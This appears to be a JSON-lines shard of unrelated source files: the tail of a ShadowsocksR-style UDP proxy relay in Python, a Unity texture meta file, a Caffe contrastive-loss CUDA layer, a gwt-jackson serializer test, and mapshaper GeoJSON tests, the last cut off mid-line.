self._protocol.obfs.server_info.iv = ref_iv[0]\n data = self._protocol.client_udp_pre_encrypt(data)\n #logging.debug(\"%s\" % (binascii.hexlify(data),))\n data = encrypt.encrypt_all_m(key, ref_iv, m, self._method, data)\n except Exception:\n logging.debug(\"UDP handle_server: encrypt data failed\")\n return\n if not data:\n return\n else:\n data = data[header_length:]\n if not data:\n return\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n logging.error(\"exception from user %d\" % (user_id,))\n\n try:\n client.sendto(data, (server_addr, server_port))\n self.add_transfer_u(client_uid, len(data))\n if client_pair is None: # new request\n addr, port = client.getsockname()[:2]\n common.connect_log('UDP data to %s(%s):%d from %s:%d by user %d' %\n (common.to_str(remote_addr[0]), common.to_str(server_addr), server_port, addr, port, user_id))\n except IOError as e:\n err = eventloop.errno_from_exception(e)\n logging.warning('IOError sendto %s:%d by user %d' % (server_addr, server_port, user_id))\n if err in (errno.EINPROGRESS, errno.EAGAIN):\n pass\n else:\n shell.print_exception(e)\n\n def _handle_client(self, sock):\n data, r_addr = sock.recvfrom(BUF_SIZE)\n if not data:\n logging.debug('UDP handle_client: data is empty')\n return\n if self._stat_callback:\n self._stat_callback(self._listen_port, len(data))\n\n client_addr = self._client_fd_to_server_addr.get(sock.fileno())\n client_uid = None\n if client_addr:\n key = client_key(client_addr[0], client_addr[1])\n client_pair = self._cache.get(key, None)\n client_dns_pair = self._cache_dns_client.get(key, None)\n if client_pair:\n client, client_uid = client_pair\n elif client_dns_pair:\n client, client_uid = client_dns_pair\n\n if not self._is_local:\n addrlen = len(r_addr[0])\n if addrlen > 255:\n # drop\n return\n\n origin_data = data[:]\n\n data = pack_addr(r_addr[0]) + struct.pack('>H', r_addr[1]) + data\n try:\n ref_iv = [encrypt.encrypt_new_iv(self._method)]\n self._protocol.obfs.server_info.iv = ref_iv[0]\n data = self._protocol.server_udp_pre_encrypt(data, client_uid)\n response = encrypt.encrypt_all(self._password,\n self._method, data)\n except Exception:\n logging.debug(\"UDP handle_client: encrypt data failed\")\n return\n if not response:\n return\n else:\n try:\n data, key, ref_iv = encrypt.decrypt_all(self._password,\n self._method, data)\n except Exception:\n logging.debug('UDP handle_client: decrypt data failed')\n return\n if not data:\n return\n self._protocol.obfs.server_info.recv_iv = ref_iv[0]\n data = self._protocol.client_udp_post_decrypt(data)\n header_result = parse_header(data)\n if header_result is None:\n return\n #connecttype, dest_addr, dest_port, header_length = header_result\n #logging.debug('UDP handle_client %s:%d to %s:%d' % (common.to_str(r_addr[0]), r_addr[1], dest_addr, dest_port))\n\n response = b'\\x00\\x00\\x00' + data\n\n if client_addr:\n if client_uid:\n self.add_transfer_d(client_uid, len(response))\n else:\n self.server_transfer_dl += len(response)\n\n if self._is_relay(r_addr, origin_data, client_uid):\n response = origin_data\n\n self.write_to_server_socket(response, client_addr[0])\n if client_dns_pair:\n logging.debug(\n \"remove dns client %s:%d\" %\n (client_addr[0][0], client_addr[0][1]))\n del self._cache_dns_client[key]\n self._close_client(client_dns_pair[0])\n else:\n # this packet is from somewhere else we know\n # simply drop that packet\n pass\n\n def write_to_server_socket(self, data, addr):\n uncomplete = False\n retry = 0\n try:\n self._server_socket.sendto(data, addr)\n data = None\n while self._data_to_write_to_server_socket:\n data_buf = self._data_to_write_to_server_socket[0]\n retry = data_buf[1] + 1\n del self._data_to_write_to_server_socket[0]\n data, addr = data_buf[0]\n self._server_socket.sendto(data, addr)\n except (OSError, IOError) as e:\n error_no = eventloop.errno_from_exception(e)\n uncomplete = True\n if error_no in (errno.EWOULDBLOCK,):\n pass\n else:\n shell.print_exception(e)\n return False\n # if uncomplete and data is not None and retry < 3:\n # self._data_to_write_to_server_socket.append([(data, addr), retry])\n #'''\n\n def add_to_loop(self, loop):\n if self._eventloop:\n raise Exception('already add to loop')\n if self._closed:\n raise Exception('already closed')\n self._eventloop = loop\n\n server_socket = self._server_socket\n self._eventloop.add(server_socket,\n eventloop.POLL_IN | eventloop.POLL_ERR, self)\n loop.add_periodic(self.handle_periodic)\n\n def remove_handler(self, handler):\n index = self._handler_to_timeouts.get(hash(handler), -1)\n if index >= 0:\n # delete is O(n), so we just set it to None\n self._timeouts[index] = None\n del self._handler_to_timeouts[hash(handler)]\n\n def update_activity(self, handler):\n # set handler to active\n now = int(time.time())\n if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:\n # thus we can lower timeout modification frequency\n return\n handler.last_activity = now\n index = self._handler_to_timeouts.get(hash(handler), -1)\n if index >= 0:\n # delete is O(n), so we just set it to None\n self._timeouts[index] = None\n length = len(self._timeouts)\n self._timeouts.append(handler)\n self._handler_to_timeouts[hash(handler)] = length\n\n def _sweep_timeout(self):\n # tornado's timeout memory management is more flexible than we need\n # we just need a sorted last_activity queue and it's faster than heapq\n # in fact we can do O(1) insertion/remove so we invent our own\n if self._timeouts:\n logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')\n now = time.time()\n length = len(self._timeouts)\n pos = self._timeout_offset\n while pos < length:\n handler = self._timeouts[pos]\n if handler:\n if now - handler.last_activity < self._timeout:\n break\n else:\n if handler.remote_address:\n logging.debug('timed out: %s:%d' %\n handler.remote_address)\n else:\n logging.debug('timed out')\n handler.destroy()\n handler.destroy_local()\n self._timeouts[pos] = None # free memory\n pos += 1\n else:\n pos += 1\n if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:\n # clean up the timeout queue when it gets larger than half\n # of the queue\n self._timeouts = self._timeouts[pos:]\n for key in self._handler_to_timeouts:\n self._handler_to_timeouts[key] -= pos\n pos = 0\n self._timeout_offset = pos\n\n def handle_event(self, sock, fd, event):\n if sock == self._server_socket:\n if event & eventloop.POLL_ERR:\n logging.error('UDP server_socket err')\n try:\n self._handle_server()\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n elif sock and (fd in self._sockets):\n if event & eventloop.POLL_ERR:\n logging.error('UDP client_socket err')\n try:\n self._handle_client(sock)\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n else:\n if sock:\n handler = self._fd_to_handlers.get(fd, None)\n if handler:\n handler.handle_event(sock, event)\n else:\n logging.warn('poll removed fd')\n\n def handle_periodic(self):\n if self._closed:\n self._cache.clear(0)\n self._cache_dns_client.clear(0)\n if self._eventloop:\n self._eventloop.remove_periodic(self.handle_periodic)\n self._eventloop.remove(self._server_socket)\n if self._server_socket:\n self._server_socket.close()\n self._server_socket = None\n logging.info('closed UDP port %d', self._listen_port)\n else:\n before_sweep_size = len(self._sockets)\n self._cache.sweep()\n self._cache_dns_client.sweep()\n if before_sweep_size != len(self._sockets):\n logging.debug(\n 'UDP port %5d sockets %d' %\n (self._listen_port, len(\n self._sockets)))\n self._sweep_timeout()\n\n def connected_iplist_clean(self):\n self.is_cleaninglist = True\n del self.connected_iplist[:]\n self.is_cleaning_connected_iplist = False\n\n def mu_connected_iplist_clean(self):\n self.is_cleaning_mu_connected_iplist = True\n for id in self.mu_connected_iplist:\n del self.mu_connected_iplist[id][:]\n self.is_cleaning_mu_connected_iplist = False\n\n def wrong_iplist_clean(self):\n self.is_cleaning_wrong_iplist = True\n\n temp_new_list = {}\n for key in self.wrong_iplist:\n if self.wrong_iplist[key] > time.time() - 60:\n temp_new_list[key] = self.wrong_iplist[key]\n\n self.wrong_iplist = temp_new_list.copy()\n\n self.is_cleaning_wrong_iplist = True\n\n def detect_log_list_clean(self):\n self.is_cleaning_detect_log = True\n del self.detect_log_list[:]\n self.is_cleaning_detect_log = False\n\n def mu_detect_log_list_clean(self):\n self.is_cleaning_mu_detect_log_list = True\n for id in self.mu_detect_log_list:\n del self.mu_detect_log_list[id][:]\n self.is_cleaning_mu_detect_log_list = False\n\n def reset_single_multi_user_traffic(self, user_id):\n if user_id in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[user_id] = 0\n if user_id in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[user_id] = 0\n\n def modify_detect_text_list(self, new_list):\n self.is_pushing_detect_text_list = True\n self.detect_text_list = new_list.copy()\n self.is_pushing_detect_text_list = False\n\n def modify_detect_hex_list(self, new_list):\n self.is_pushing_detect_hex_list = True\n self.detect_hex_list = new_list.copy()\n self.is_pushing_detect_hex_list = False\n\n def modify_multi_user_table(self, new_table):\n self.multi_user_table = new_table.copy()\n self.multi_user_host_table = {}\n\n self._protocol.obfs.server_info.users = self.multi_user_table\n\n for id in self.multi_user_table:\n self.multi_user_host_table[common.get_mu_host(\n id, self.multi_user_table[id]['md5'])] = id\n if self.multi_user_table[id]['forbidden_ip'] is not None:\n self.multi_user_table[id]['_forbidden_iplist'] = IPNetwork(\n str(self.multi_user_table[id]['forbidden_ip']))\n else:\n self.multi_user_table[id][\n '_forbidden_iplist'] = IPNetwork(str(\"\"))\n if self.multi_user_table[id]['disconnect_ip'] is not None:\n self.multi_user_table[id]['_disconnect_ipset'] = IPNetwork(\n str(self.multi_user_table[id]['disconnect_ip']))\n else:\n self.multi_user_table[id]['_disconnect_ipset'] = None\n if self.multi_user_table[id]['forbidden_port'] is not None:\n self.multi_user_table[id]['_forbidden_portset'] = PortRange(\n str(self.multi_user_table[id]['forbidden_port']))\n else:\n self.multi_user_table[id][\n '_forbidden_portset'] = PortRange(str(\"\"))\n\n def push_relay_rules(self, rules):\n self._is_pushing_relay_rules = True\n self._relay_rules = rules.copy()\n self._is_pushing_relay_rules = False\n\n def close(self, next_tick=False):\n logging.debug('UDP close')\n self._closed = True\n if not next_tick:\n if self._eventloop:\n self._eventloop.remove_periodic(self.handle_periodic)\n self._eventloop.remove(self._server_socket)\n self._server_socket.close()\n self._cache.clear(0)\n self._cache_dns_client.clear(0)\n"} {"text": "fileFormatVersion: 2\nguid: 5979e13c57f69d542883bb8532860b59\nTextureImporter:\n internalIDToNameTable: []\n externalObjects: {}\n serializedVersion: 8\n mipmaps:\n mipMapMode: 0\n enableMipMap: 1\n sRGBTexture: 0\n linearTexture: 0\n fadeOut: 0\n borderMipMap: 0\n mipMapsPreserveCoverage: 0\n alphaTestReferenceValue: 0.5\n mipMapFadeDistanceStart: 1\n mipMapFadeDistanceEnd: 3\n bumpmap:\n convertToNormalMap: 0\n externalNormalMap: 0\n heightScale: 0.25\n normalMapFilter: 0\n isReadable: 0\n streamingMipmaps: 0\n streamingMipmapsPriority: 0\n grayScaleToAlpha: 0\n generateCubemap: 6\n cubemapConvolution: 0\n seamlessCubemap: 0\n textureFormat: 1\n maxTextureSize: 2048\n textureSettings:\n serializedVersion: 2\n filterMode: -1\n aniso: 4\n mipBias: -1\n wrapU: -1\n wrapV: -1\n wrapW: -1\n nPOTScale: 1\n lightmap: 0\n compressionQuality: 50\n spriteMode: 0\n spriteExtrude: 1\n spriteMeshType: 1\n alignment: 0\n spritePivot: {x: 0.5, y: 0.5}\n spritePixelsToUnits: 100\n spriteBorder: {x: 0, y: 0, z: 0, w: 0}\n spriteGenerateFallbackPhysicsShape: 1\n alphaUsage: 1\n alphaIsTransparency: 0\n spriteTessellationDetail: -1\n textureType: 1\n textureShape: 1\n singleChannelComponent: 0\n maxTextureSizeSet: 0\n compressionQualitySet: 0\n textureFormatSet: 0\n platformSettings:\n - serializedVersion: 2\n buildTarget: DefaultTexturePlatform\n maxTextureSize: 2048\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 2\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Standalone\n maxTextureSize: 2048\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 2\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: iPhone\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Android\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Windows Store Apps\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n spriteSheet:\n serializedVersion: 2\n sprites: []\n outline: []\n physicsShape: []\n bones: []\n spriteID: \n internalID: 0\n vertices: []\n indices: \n edges: []\n weights: []\n spritePackingTag: \n pSDRemoveMatte: 0\n pSDShowRemoveMatteOption: 0\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "#include \n#include \n\n#include \"caffe/layers/contrastive_loss_layer.hpp\"\n#include \"caffe/util/math_functions.hpp\"\n\nnamespace caffe {\n\ntemplate \nvoid ContrastiveLossLayer::Forward_gpu(\n const vector*>& bottom, const vector*>& top) {\n const int count = bottom[0]->count();\n caffe_gpu_sub(\n count,\n bottom[0]->gpu_data(), // a\n bottom[1]->gpu_data(), // b\n diff_.mutable_gpu_data()); // a_i-b_i\n caffe_gpu_powx(\n count,\n diff_.mutable_gpu_data(), // a_i-b_i\n Dtype(2),\n diff_sq_.mutable_gpu_data()); // (a_i-b_i)^2\n caffe_gpu_gemv(\n CblasNoTrans,\n bottom[0]->num(),\n bottom[0]->channels(),\n Dtype(1.0),\n diff_sq_.gpu_data(), // (a_i-b_i)^2\n summer_vec_.gpu_data(),\n Dtype(0.0),\n dist_sq_.mutable_gpu_data()); // \\Sum (a_i-b_i)^2\n Dtype margin = this->layer_param_.contrastive_loss_param().margin();\n bool legacy_version =\n this->layer_param_.contrastive_loss_param().legacy_version();\n Dtype loss(0.0);\n for (int i = 0; i < bottom[0]->num(); ++i) {\n if (static_cast(bottom[2]->cpu_data()[i])) { // similar pairs\n loss += dist_sq_.cpu_data()[i];\n } else { // dissimilar pairs\n if (legacy_version) {\n loss += std::max(margin - dist_sq_.cpu_data()[i], Dtype(0.0));\n } else {\n Dtype dist = std::max(margin - sqrt(dist_sq_.cpu_data()[i]),\n Dtype(0.0));\n loss += dist*dist;\n }\n }\n }\n loss = loss / static_cast(bottom[0]->num()) / Dtype(2);\n top[0]->mutable_cpu_data()[0] = loss;\n}\n\ntemplate \n__global__ void CLLBackward(const int count, const int channels,\n const Dtype margin, const bool legacy_version, const Dtype alpha,\n const Dtype* y, const Dtype* diff, const Dtype* dist_sq,\n Dtype *bottom_diff) {\n CUDA_KERNEL_LOOP(i, count) {\n int n = i / channels; // the num index, to access y and dist_sq\n if (static_cast(y[n])) { // similar pairs\n bottom_diff[i] = alpha * diff[i];\n } else { // dissimilar pairs\n Dtype mdist(0.0);\n Dtype beta(0.0);\n if (legacy_version) {\n mdist = (margin - dist_sq[n]);\n beta = -alpha;\n } else {\n Dtype dist = sqrt(dist_sq[n]);\n mdist = (margin - dist);\n beta = -alpha * mdist / (dist + Dtype(1e-4)) * diff[i];\n }\n if (mdist > 0.0) {\n bottom_diff[i] = beta;\n } else {\n bottom_diff[i] = 0;\n }\n }\n }\n}\n\ntemplate \nvoid ContrastiveLossLayer::Backward_gpu(const vector*>& top,\n const vector& propagate_down, const vector*>& bottom) {\n for (int i = 0; i < 2; ++i) {\n if (propagate_down[i]) {\n const int count = bottom[0]->count();\n const int channels = bottom[0]->channels();\n Dtype margin = this->layer_param_.contrastive_loss_param().margin();\n const bool legacy_version =\n this->layer_param_.contrastive_loss_param().legacy_version();\n const Dtype sign = (i == 0) ? 1 : -1;\n const Dtype alpha = sign * top[0]->cpu_diff()[0] /\n static_cast(bottom[0]->num());\n // NOLINT_NEXT_LINE(whitespace/operators)\n CLLBackward<<>>(\n count, channels, margin, legacy_version, alpha,\n bottom[2]->gpu_data(), // pair similarity 0 or 1\n diff_.gpu_data(), // the cached eltwise difference between a and b\n dist_sq_.gpu_data(), // the cached square distance between a and b\n bottom[i]->mutable_gpu_diff());\n CUDA_POST_KERNEL_CHECK;\n }\n }\n}\n\nINSTANTIATE_LAYER_GPU_FUNCS(ContrastiveLossLayer);\n\n} // namespace caffe\n"} {"text": "/*\n * Copyright 2013 Nicolas Morel\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.github.nmorel.gwtjackson.client.mapper;\n\nimport com.github.nmorel.gwtjackson.client.GwtJacksonTestCase;\nimport com.github.nmorel.gwtjackson.client.JsonSerializationContext;\nimport com.github.nmorel.gwtjackson.client.ObjectWriter;\nimport com.github.nmorel.gwtjackson.shared.mapper.SimpleBeanJsonMapperTester;\nimport com.github.nmorel.gwtjackson.shared.model.SimpleBean;\nimport com.google.gwt.core.client.GWT;\n\n/**\n * @author Nicolas Morel\n */\npublic class SimpleBeanObjectWriterTest extends GwtJacksonTestCase {\n\n public static interface SimpleBeanMapper extends ObjectWriter {\n\n static SimpleBeanMapper INSTANCE = GWT.create( SimpleBeanMapper.class );\n }\n\n private SimpleBeanJsonMapperTester tester = SimpleBeanJsonMapperTester.INSTANCE;\n\n public void testSerializeValue() {\n tester.testSerializeValue( createWriter( SimpleBeanMapper.INSTANCE ) );\n }\n\n public void testWriteBeanWithNullProperties() {\n tester.testWriteWithNullProperties( createWriter( SimpleBeanMapper.INSTANCE, JsonSerializationContext.builder()\n .serializeNulls( false ).build() ) );\n }\n}\n"} {"text": "var api = require('../'),\n DataTable = api.internal.DataTable,\n assert = require('assert');\n\nvar Utils = api.utils;\n\nfunction fixPath(p) {\n return require('path').join(__dirname, p);\n}\n\ndescribe('mapshaper-geojson.js', function () {\n\n describe('getDatasetBbox()', function() {\n\n describe('RFC 7946 bbox', function() {\n function getBbox(geojson) {\n var d = api.internal.importGeoJSON(geojson, {});\n return api.internal.getDatasetBbox(d, true);\n }\n\n it('wrapped bbox 1', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-170, 0], [170, 0]]\n }\n assert.deepEqual(getBbox(input), [170, 0, -170, 0]);\n })\n\n it('wrapped bbox2', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-180, 0], [180, 1], [10, -1]]\n }\n assert.deepEqual(getBbox(input), [10, -1, -180, 1]);\n })\n\n it('wrapped bbox 3 (lines)', function() {\n var input = {\n type: 'MultiLineString',\n coordinates: [[[-180, 0], [-170, 1]], [[170, -1], [175, -2]]]\n }\n assert.deepEqual(getBbox(input), [170, -2, -170, 1]);\n })\n\n it('non-wrapped points: Western Hemisphere', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-170, 0], [-180, 1], [-90, -1]]\n }\n assert.deepEqual(getBbox(input), [-180, -1, -90, 1]);\n })\n\n it('non-wrapped points: Eastern Hemisphere', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[170, 0], [180, 1], [90, -1]]\n }\n assert.deepEqual(getBbox(input), [90, -1, 180, 1]);\n })\n\n it('non-wrapped points 3', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[100, 0], [0, 1], [-100, -1]]\n }\n assert.deepEqual(getBbox(input), [-100, -1, 100, 1]);\n })\n\n it('null bbox', function() {\n var input = {\n type: 'GeometryCollection',\n geometries: []\n }\n assert.strictEqual(getBbox(input), null);\n })\n\n });\n\n });\n\n\n describe('importGeoJSON', function () {\n it('Import FeatureCollection with polygon geometries', function () {\n var data = api.importFile(fixPath('data/two_states.json'))\n assert.equal(data.layers[0].shapes.length, 2);\n assert.equal(data.layers[0].data.size(), 2);\n })\n\n it('Import FeatureCollection with three null geometries', function () {\n var data = api.importFile(fixPath('data/six_counties_three_null.json'), 'geojson');\n assert.equal(data.layers[0].data.size(), 6);\n assert.equal(data.layers[0].shapes.length, 6);\n assert.equal(data.layers[0].shapes.filter(function(shape) {return shape != null}).length, 3)\n assert.deepEqual(Utils.pluck(data.layers[0].data.getRecords(), 'NAME'), [\"District of Columbia\", \"Arlington\", \"Fairfax County\", \"Alexandria\", \"Fairfax City\", \"Manassas\"]);\n })\n\n it('Able to import GeometryCollection containing null geometry (non-standard)', function() {\n var geojson = {\n type: 'GeometryCollection',\n geometries: [\n null,\n {type: 'Point', coordinates: [1, 1]}\n ]\n };\n var dataset = api.internal.importGeoJSON(geojson, {});\n assert.deepEqual(dataset.layers[0].shapes, [null, [[1, 1]]]);\n\n })\n\n it('Able to import Feature containing GeometryCollection of same-type objects', function() {\n var json = {\n \"type\": \"Feature\",\n \"properties\": {\"name\": \"A\"},\n \"geometry\": {\n \"type\": \"GeometryCollection\",\n \"geometries\": [{\n \"type\": \"MultiPoint\",\n \"coordinates\": [[0, 1], [2, 3]]\n }, {\n \"type\": \"Point\",\n \"coordinates\": [4, 5]\n }\n ]\n }\n };\n var dataset = api.internal.importGeoJSON(json, {});\n assert.deepEqual(dataset.layers[0].shapes, [[[0, 1], [2, 3], [4, 5]]])\n })\n\n it('Unable to import Feature containing mixed geometry types', function() {\n var json = {\n \"type\": \"Feature\",\n \"properties\": {\"name\": \"A\"},\n \"geometry\": {\n \"type\": \"GeometryCollection\",\n \"geometries\": [{\n \"type\": \"MultiPoint\",\n \"coordinates\": [[0, 1], [2, 3]]\n }, {\n \"type\": \"LineString\",\n \"coordinates\": [[0, 1], [2, 3], [4, 5]]\n }, {\n \"type\": \"Polygon\",\n \"coordinates\": [[[0, 1], [1, 1], [0, 0], [0, 1]]]\n }\n ]\n }\n };\n\n assert.throws(function() {api.internal.importGeoJSON(json, {});}, /Unable to import mixed/);\n });\n\n it('Import FeatureCollection with mixed geometry types', function() {\n var json = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: null,\n geometry: {\n type: \"MultiPoint\",\n coordinates: [[0, 1], [2, 3]]\n }\n }, {\n type: \"Feature\",\n properties: {name: \"A\"},\n geometry: {\n type: \"LineString\",\n coordinates: [[0, 1], [2, 3], [4, 5]]\n }\n }, {\n type: \"Feature\",\n properties: {name: \"B\"},\n geometry: {\n type: \"Polygon\",\n coordinates: [[[0, 1], [1, 1], [0, 0], [0, 1]]]\n }\n }]\n };\n\n var target = {\n info: {},\n arcs: [[[0, 1], [2, 3], [4, 5]], [[0, 1], [1, 1], [0, 0], [0, 1]]],\n layers: [{\n geometry_type: 'point',\n data: [{}],\n shapes: [[[0, 1], [2, 3]]]\n }, {\n geometry_type: \"polyline\",\n data: [{name: \"A\"}],\n shapes: [[[0]]]\n }, {\n geometry_type: \"polygon\",\n data: [{name: \"B\"}],\n shapes: [[[1]]]\n }]\n }\n\n var dataset = api.internal.importGeoJSON(json, {});\n var data = JSON.stringify(dataset)\n assert.deepEqual(JSON.parse(data), target);\n })\n\n it('Import Feature with id field', function () {\n var obj = {\n type: 'Feature',\n id: 'foo',\n properties: {},\n geometry: {\n type: 'Point',\n coordinates: [2, 1]\n }\n };\n var dataset = api.internal.importGeoJSON(obj, {id_field: 'name'});\n var records = dataset.layers[0].data.getRecords();\n assert.deepEqual(records, [{name: 'foo'}]);\n })\n\n\n it('Import GeometryCollection inside a feature', function() {\n var src = {\n type: 'Feature',\n properties: {id: 0},\n geometry: {\n type: 'GeometryCollection',\n geometries: [{\n type: \"Polygon\",\n coordinates: [[[3, 1], [1, 1], [2, 3], [3, 1]]]\n }, {\n type: \"Polygon\",\n coordinates: [[[5, 3], [4, 1], [3, 3], [5, 3]]]\n }]\n }\n }\n // Separate Polygons are convered into a MultiPolygon\n var target = {\n type: 'Feature',\n properties: {id: 0},\n geometry: {\n type: 'MultiPolygon',\n coordinates: [[[[3, 1], [1, 1], [2, 3], [3, 1]]], [[[5, 3], [4, 1], [3, 3], [5, 3]]]]\n }\n };\n var dataset = api.internal.importGeoJSON(src, {});\n var output = api.internal.exportDatasetAsGeoJSON(dataset, {});\n assert.deepEqual(output.features[0], target);\n })\n })\n\n\n describe('exportGeoJSON()', function () {\n\n describe('-o geojson-type= option', function() {\n\n it('geojson-type=Feature, no attributes', function() {\n var input = {type: 'Point', coordinates: [0, 0]};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 'Feature'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'Feature',\n properties: null,\n geometry: {\n type: 'Point',\n coordinates: [0, 0]\n }\n });\n });\n\n it('geojson-type=FeatureCollection, no attributes', function() {\n var input = {type: 'Point', coordinates: [0, 0]};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 'FeatureCollection'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'FeatureCollection',\n features: [{\n type: 'Feature',\n properties: null,\n geometry: {\n type: 'Point',\n coordinates: [0, 0]\n }\n }]\n });\n });\n\n it('geojson-type=GeometryCollection (data has attributes)', function() {\n var input = {type: 'Feature', properties: {name: 'foo'}, geometry: {type: 'Point', coordinates: [0, 0]}};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 'GeometryCollection'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'GeometryCollection',\n geometries: [ {\n type: 'Point',\n coordinates: [0, 0]\n }]\n });\n });\n\n });\n\n describe('-o rfc7946 option', function () {\n\n // rfc7946 flag still truncates coordinates\n // (now deprecated, because output is rfc 7946 compatible by default)\n it('Default coordinate precision is 6 decimals', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[4.000000000000001, 3.999999999999], [0.123456789,-9.87654321]]\n };\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {rfc7946: true})[0].content.toString();\n var coords = output.match(/\"coordinates.*\\]\\]/)[0];\n assert.equal(coords, '\"coordinates\":[[4,4],[0.123457,-9.876543]]');\n });\n\n it('A warning is generated for non-lat-long datasets', function() {\n var input = {\n type: 'Point',\n coordinates: [100, 100]\n },\n dataset = api.internal.importGeoJSON(input, {});\n assert(/RFC 7946 warning/.test(api.internal.getRFC7946Warnings(dataset)));\n })\n\n it('Use CCW winding order for rings and CW for holes', function (done) {\n var input = {\n type:\"GeometryCollection\",\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 10.0], [110.0, 10.0], [110.0, 0.0], [100.0, 0.0]],\n [[101.0, 1.0], [109.0, 1.0], [109.0, 9.0], [101.0, 9.0], [101.0, 1.0]]\n ]\n }]};\n\n var target = [[[100.0, 0.0], [110.0, 0.0], [110.0, 10.0], [100.0, 10.0], [100.0, 0.0]],\n [[101.0, 1.0], [101.0, 9.0], [109.0, 9.0], [109.0, 1.0], [101.0, 1.0]]\n ];\n\n api.applyCommands('-i input.json -o output.json rfc7946', {'input.json': input}, function(err, output) {\n var json = JSON.parse(output['output.json']);\n assert.deepEqual(json.geometries[0].coordinates, target);\n done();\n });\n\n })\n })\n\n describe('-i geometry-type option', function () {\n it('filters geometry types inside nested GeometryCollection', function (done) {\n var geo = {\n type: 'GeometryCollection',\n geometries: [{\n type: 'GeometryCollection',\n geometries: [{\n type: 'Point',\n coordinates: [0, 0]\n }, {\n type: 'LineString',\n coordinates: [[1, 1], [0, 1]]\n }, {\n type: 'Polygon',\n coordinates: [[[5, 5], [5, 6], [6, 6], [5, 5]]]\n }]\n }]\n };\n var expect = {\n type: 'GeometryCollection',\n geometries: [{\n type: 'Point',\n coordinates: [0, 0]\n }]\n }\n api.applyCommands('-i geo.json geometry-type=point -o', {'geo.json': geo}, function(err, output) {\n var geom = JSON.parse(output['geo.json']);\n assert.deepEqual(geom, expect)\n done();\n });\n })\n })\n\n describe('-o combine-layers option', function () {\n it('combines datasets derived from same input file', function(done) {\n var a = {\n type: 'Feature',\n properties: {foo: 'a'},\n geometry: {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n }\n };\n api.applyCommands('-i a.json -filter true + name=a2 -o combine-layers', {'a.json': a}, function(err, output) {\n assert.deepEqual(JSON.parse(output['a.json']), {\n type: 'FeatureCollection',\n features: [a, a]\n });\n done();\n });\n\n });\n\n it('combines datasets of different types from different sources', function (done) {\n var a = {\n type: 'Feature',\n properties: {foo: 'a'},\n geometry: {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n }\n };\n var b = {\n type: 'Point',\n coordinates: [2, 2]\n };\n api.applyCommands('-i a.json -i b.json -o combine-layers c.json', {'a.json': a, 'b.json': b}, function(err, output) {\n assert('c.json' in output);\n assert.deepEqual(JSON.parse(output['c.json']), {\n type: 'FeatureCollection',\n features: [a,\n {\n type: 'Feature',\n properties: null,\n geometry: b\n }]\n });\n done();\n });\n })\n\n it('generated GeometryCollection when none of the layers have attribute data', function(done) {\n var a = {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n };\n var b = {\n type: 'Polygon',\n coordinates: [[[2, 2], [2, 3], [3, 2], [2, 2]]]\n };\n api.applyCommands('-i a.json b.json combine-files -o gj2008 combine-layers', {'a.json': a, 'b.json': b}, function(err, output) {\n assert.deepEqual(JSON.parse(output['output.json']), {\n type: 'GeometryCollection',\n geometries: [a, b]\n });\n done();\n });\n })\n\n it('respects -o target= option', function(done) {\n var a = {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n };\n var b = {\n type: 'Polygon',\n coordinates: [[[2, 2], [2, 3], [3, 2], [2, 2]]]\n };\n api.applyCommands('-i a.json b.json 